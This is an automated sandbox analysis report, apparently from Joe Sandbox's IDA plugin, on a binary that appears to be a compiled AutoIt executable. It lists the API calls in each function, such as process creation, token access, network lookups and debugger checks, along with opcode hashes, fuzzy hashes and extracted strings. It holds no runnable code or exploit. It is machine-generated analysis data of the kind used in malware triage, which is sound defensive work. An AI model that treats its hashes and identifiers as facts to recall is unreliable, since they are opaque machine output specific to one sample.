                                                                        • Opcode Fuzzy Hash: 66ec43ad0cfa251ac60e7fc983bf2fca4d5b0bc051ea8910a770e41b5ab42137
                                                                        • Instruction Fuzzy Hash: 8E11CE32904508EADB105AB88C4AFAD7A34FF07730F2403B9F4A8D31E1D636C951A262
                                                                        APIs
                                                                          • Part of subcall function 00895A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008F7896,?,?,00000000), ref: 00895A2C
                                                                          • Part of subcall function 00895A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008F7896,?,?,00000000,?,?), ref: 00895A50
                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00906399
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 009063A4
                                                                        • _memmove.LIBCMT ref: 009063D1
                                                                        • inet_ntoa.WSOCK32(?), ref: 009063DC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                        • String ID:
                                                                        • API String ID: 1504782959-0
                                                                        • Opcode ID: ba71155c719535ac1cec2f7f6eeddfbeca4fe882f992fe75a40706b867df7d94
                                                                        • Instruction ID: 9b85ece15056aa0f4db64be8a385f17c244aacdbe2aec5c8f84c5cec80ccc8b1
                                                                        • Opcode Fuzzy Hash: ba71155c719535ac1cec2f7f6eeddfbeca4fe882f992fe75a40706b867df7d94
                                                                        • Instruction Fuzzy Hash: 24110D31604109AFCF05FBA8D956DEEB7B8FF45320B144065F506E71A1DB31AE14DB62
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 008E8B61
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008E8B73
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008E8B89
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008E8BA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: c35f1a5ce1262c78c9e2a1210b07ccf3592e8a9741d447da8702d1257050b6fc
                                                                        • Instruction ID: 03b24a4f23d6f5b40ad04cda144625bbf35993f4a66877acf9779b5dcdfd9c0a
                                                                        • Opcode Fuzzy Hash: c35f1a5ce1262c78c9e2a1210b07ccf3592e8a9741d447da8702d1257050b6fc
                                                                        • Instruction Fuzzy Hash: 89112E79901218FFDB11DF95CC85F9DBB74FB49710F204095E904B7250DA716E11DB94
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 008912D8
                                                                        • GetClientRect.USER32(?,?), ref: 008CB5FB
                                                                        • GetCursorPos.USER32(?), ref: 008CB605
                                                                        • ScreenToClient.USER32(?,?), ref: 008CB610
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 4127811313-0
                                                                        • Opcode ID: f948898cc16bd0843cdb2ce10d858b54db30e0ec65a34f5bbcc7a928e50e6a7d
                                                                        • Instruction ID: f446f680b512e3d87070849c52190dd52341a3de9a817b2ec19ac96dc384d5fa
                                                                        • Opcode Fuzzy Hash: f948898cc16bd0843cdb2ce10d858b54db30e0ec65a34f5bbcc7a928e50e6a7d
                                                                        • Instruction Fuzzy Hash: D211463561801EAFCF00EF98C8899EE77B9FB05301F4044A5F901E7141C730BA51DBA5
                                                                        APIs
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 008F115F
                                                                        • Sleep.KERNEL32(00000000), ref: 008F1184
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 008F118E
                                                                        • Sleep.KERNEL32(?), ref: 008F11C1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CounterPerformanceQuerySleep
                                                                        • String ID:
                                                                        • API String ID: 2875609808-0
                                                                        • Opcode ID: eb1758f6e1e41a0ebc9a5388628eaeee4c49602c83f8789947d233f04d51bd04
                                                                        • Instruction ID: cb13664a4b23aad648a08f1e1ab7df0901589e44edef9782c4eeb8858027073d
                                                                        • Opcode Fuzzy Hash: eb1758f6e1e41a0ebc9a5388628eaeee4c49602c83f8789947d233f04d51bd04
                                                                        • Instruction Fuzzy Hash: BC111831D0491DEBCF009FA5D848AFEBB78FB09711F004155EB45F2240CB709590DB95
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 008ED84D
                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 008ED864
                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008ED879
                                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008ED897
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                        • String ID:
                                                                        • API String ID: 1352324309-0
                                                                        • Opcode ID: eb0d4c54306f39613b3ff2b6d0dfb70b61090659fee27fbeced99b586a05b59d
                                                                        • Instruction ID: 46b1642c832c3fec7b18db0e11c4f0ad9e465145cd41dc5ca079edf59e680b82
                                                                        • Opcode Fuzzy Hash: eb0d4c54306f39613b3ff2b6d0dfb70b61090659fee27fbeced99b586a05b59d
                                                                        • Instruction Fuzzy Hash: AF115EB5605369EBE320CF52DC08F92BBBCFB01B04F108979A916D6090D7B1E549EBA1
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                        • Instruction ID: 3c4994fc95b32946bc3f3d800b79613169dbf5187d28ded614d7c51e096edb17
                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                        • Instruction Fuzzy Hash: CD014B7244854EBBCF165E89DC01DEE3F72FB28394F588419FA1898031D636C9B1AF81
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0091B2E4
                                                                        • ScreenToClient.USER32(?,?), ref: 0091B2FC
                                                                        • ScreenToClient.USER32(?,?), ref: 0091B320
                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0091B33B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                        • String ID:
                                                                        • API String ID: 357397906-0
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0091B644
                                                                        • _memset.LIBCMT ref: 0091B653
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00956F20,00956F64), ref: 0091B682
                                                                        • CloseHandle.KERNEL32 ref: 0091B694
                                                                        Similarity
                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                        • String ID:
                                                                        • API String ID: 3277943733-0
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 008F6BE6
                                                                          • Part of subcall function 008F76C4: _memset.LIBCMT ref: 008F76F9
                                                                        • _memmove.LIBCMT ref: 008F6C09
                                                                        • _memset.LIBCMT ref: 008F6C16
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 008F6C26
                                                                        Similarity
                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                        • String ID:
                                                                        • API String ID: 48991266-0
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 00892231
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0089223B
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00892250
                                                                        • GetStockObject.GDI32(00000005), ref: 00892258
                                                                        • GetWindowDC.USER32(?,00000000), ref: 008CBE83
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 008CBE90
                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 008CBEA9
                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 008CBEC2
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 008CBEE2
                                                                        • ReleaseDC.USER32(?,00000000), ref: 008CBEED
                                                                        Similarity
                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1946975507-0
                                                                        APIs
                                                                        • GetCurrentThread.KERNEL32 ref: 008E871B
                                                                        • OpenThreadToken.ADVAPI32(00000000), ref: 008E8722
                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 008E872F
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 008E8736
                                                                        Similarity
                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                        • String ID:
                                                                        • API String ID: 3974789173-0
                                                                        APIs
                                                                        • OleSetContainedObject.OLE32(0000000C,00000001), ref: 008EB4BE
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ContainedObject
                                                                        • String ID: AutoIt3GUI$Container
                                                                        • API String ID: 3565006973-3941886329
                                                                        APIs
                                                                          • Part of subcall function 008AFC86: _wcscpy.LIBCMT ref: 008AFCA9
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • __wcsnicmp.LIBCMT ref: 008FB02D
                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 008FB0F6
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Connection__itow__wcsnicmp_wcscpy
                                                                        • String ID: LPT
                                                                        • API String ID: 2143227475-1350329615
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000033), ref: 00896441
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: =
                                                                        • API String ID: 3964851224-2322244508
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 008A2968
                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 008A2981
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: GlobalMemorySleepStatus
                                                                        • String ID: @
                                                                        • API String ID: 2783356886-2766056989
                                                                        APIs
                                                                          • Part of subcall function 00894F0B: __fread_nolock.LIBCMT ref: 00894F29
                                                                        • _wcscmp.LIBCMT ref: 008F9824
                                                                        • _wcscmp.LIBCMT ref: 008F9837
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: _wcscmp$__fread_nolock
                                                                        • String ID: FILE
                                                                        • API String ID: 4029003684-3121273764
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0090259E
                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009025D4
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: CrackInternet_memset
                                                                        • String ID: |
                                                                        • API String ID: 1413715105-2343686810
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00917B61
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00917B76
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: '
                                                                        • API String ID: 3850602802-1997036262
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00916B17
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00916B53
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Window$DestroyMove
                                                                        • String ID: static
                                                                        • API String ID: 2139405536-2160076837
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F2911
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008F294C
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        APIs
                                                                        • __snwprintf.LIBCMT ref: 00903A66
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: __snwprintf_memmove
                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                        • API String ID: 3506404897-2584243854
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00916761
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0091676C
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Combobox
                                                                        • API String ID: 3850602802-2096851135
                                                                        APIs
                                                                          • Part of subcall function 00891D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00891D73
                                                                          • Part of subcall function 00891D35: GetStockObject.GDI32(00000011), ref: 00891D87
                                                                          • Part of subcall function 00891D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00891D91
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00916C71
                                                                        • GetSysColor.USER32(00000012), ref: 00916C8B
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                        • String ID: static
                                                                        • API String ID: 1983116058-2160076837
                                                                        APIs
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 009169A2
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009169B1
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: LengthMessageSendTextWindow
                                                                        • String ID: edit
                                                                        • API String ID: 2978978980-2167791130
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F2A22
                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008F2A41
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        APIs
                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0090222C
                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00902255
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Internet$OpenOption
                                                                        • String ID: <local>
                                                                        • API String ID: 942729171-4266983199
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 008EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008EAABC
                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008E8E73
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 372448540-1403004172
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 008EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008EAABC
                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 008E8D6B
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 372448540-1403004172
APIs
  • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
  • Part of subcall function 008EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008EAABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 008E8DEE
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 3d4c0f907bb7bea50f6c727c7e0629c57eafabce4e6d06efc130a42fcd5a56aa
• Instruction ID: a8f753a6b76b46970b09b0ad764cb774b1634782881042d764753dbe12f6c51b
• Instruction Fuzzy Hash: 4001F771B4510CA7DF15F6A9DD42EFE77A8EF16300F140015B806F3291DE115E08D272
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: 9c9db078a89fb65df93825f00391fa4b2b5df4debf514c1fcd19acbdbf329840
• Instruction ID: 751534ec7f0d65fb9b5b77927ca36f15771317359f069f314b0ab350118e5a7e
• Instruction Fuzzy Hash: 2CE0923261422D2AD7209AA9AC49EABF7ACEB85B61F000167FD04D3151E9609A45C7E1
APIs
  • Part of subcall function 008CB314: _memset.LIBCMT ref: 008CB321
  • Part of subcall function 008B0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,008CB2F0,?,?,?,0089100A), ref: 008B0945
• IsDebuggerPresent.KERNEL32(?,?,?,0089100A), ref: 008CB2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0089100A), ref: 008CB303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008CB2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: b215262ccea979234d0ba0a5e933f42ebedce73c37dd2968cf043f30ae6c82f3
• Instruction ID: 7a267c7a5288de14a29b99b14cd28653ff7cce514ac4063d15097ad996373ad3
• Instruction Fuzzy Hash: A1E03970214B418AD730AF68E4057867AE8FF00304F00892CE456C7341EBB4E408CFA2
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008E7C82
  • Part of subcall function 008B3358: _doexit.LIBCMT ref: 008B3362
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: c871e929e129efa74a313b6b6312593510ed516a75ba7e2bac112db14cdc82d5
• Instruction ID: c8cbc426c3604ce57949d252cd9a3a4beed9ae3a703d8b9005421f87319681b0
• Instruction Fuzzy Hash: 49D02B323C831C37D11032ADBC07FCB7588DF05B56F040011FB04D92D349D1948041E6
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 008D1775
  • Part of subcall function 0090BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,008D195E,?), ref: 0090BFFE
  • Part of subcall function 0090BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0090C010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 008D196D
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
• Opcode ID: cd3854fc689111a637224453e6c37720341b84af7f4907e33da1946a6c0385db
• Instruction ID: 691dee3a2e2b820134d9d84cc78d3ff628d15e2d3b175c611ebf2dee451957b9
• Instruction Fuzzy Hash: 82F0157081910DEFCF15DB91C998AECBBB8FF08305F540096E102A21A4C7314E85DF20
Similarity
• API ID: LocalTime
• String ID: %.3d$WIN_XPe
• API String ID: 481472006-2409531811
• Opcode ID: 61bba183c8a6b80de0b2c3f179a9f79d59b03448ff735aab34370811561a2f80
• Instruction ID: a874800f91f60175d51d7049ff9b15230a1996fe743946e91b12ef0b980ae921
• Instruction Fuzzy Hash: 90D0177190910CFACF049BD0988CCFA777CFF19319F140663B402E2264E2329B94EA21